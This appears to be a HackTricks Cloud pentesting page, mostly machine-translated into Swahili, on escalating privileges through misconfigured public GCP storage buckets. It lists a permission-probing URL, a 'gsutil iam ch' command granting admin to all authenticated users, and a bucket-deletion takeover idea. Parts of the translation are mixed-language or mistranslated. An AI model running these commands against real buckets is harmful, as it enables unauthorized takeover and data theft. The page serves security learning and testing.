GCP - Public Buckets Privilege Escalation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Buckets Privilege Escalation

Ikiwa sera ya bucket iliruhusu “allUsers” au “allAuthenticatedUsers” kuandika kwenye sera yao ya bucket (idhini ya storage.buckets.setIamPolicy), basi mtu yeyote anaweza kubadilisha sera ya bucket na kujipatia ufikiaji kamili.

Check Permissions

Kuna njia 2 za kuangalia ruhusa juu ya bucket. Ya kwanza ni kuziomba kwa kufanya ombi kwa https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam au kukimbia gsutil iam get gs://BUCKET_NAME.

Hata hivyo, ikiwa mtumiaji wako (ambaye huenda ni wa allUsers au allAuthenticatedUsers") hana ruhusa ya kusoma sera ya iam ya bucket (storage.buckets.getIamPolicy), hiyo haitafanya kazi.

Chaguo lingine ambalo litafanya kazi kila wakati ni kutumia mwisho wa testPermissions wa bucket ili kubaini ikiwa una ruhusa iliyotajwa, kwa mfano kufikia: https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update

Escalating

Ili kutoa Storage Admin kwa allAuthenticatedUsers inawezekana kukimbia:

gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME

Another attack would be to ondoa bakuli na kuunda upya katika akaunti yako ili kuiba umiliki.

References

https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Storage Unauthenticated Enum NextGWS - Workspace Pentesting

Last updated 8 days ago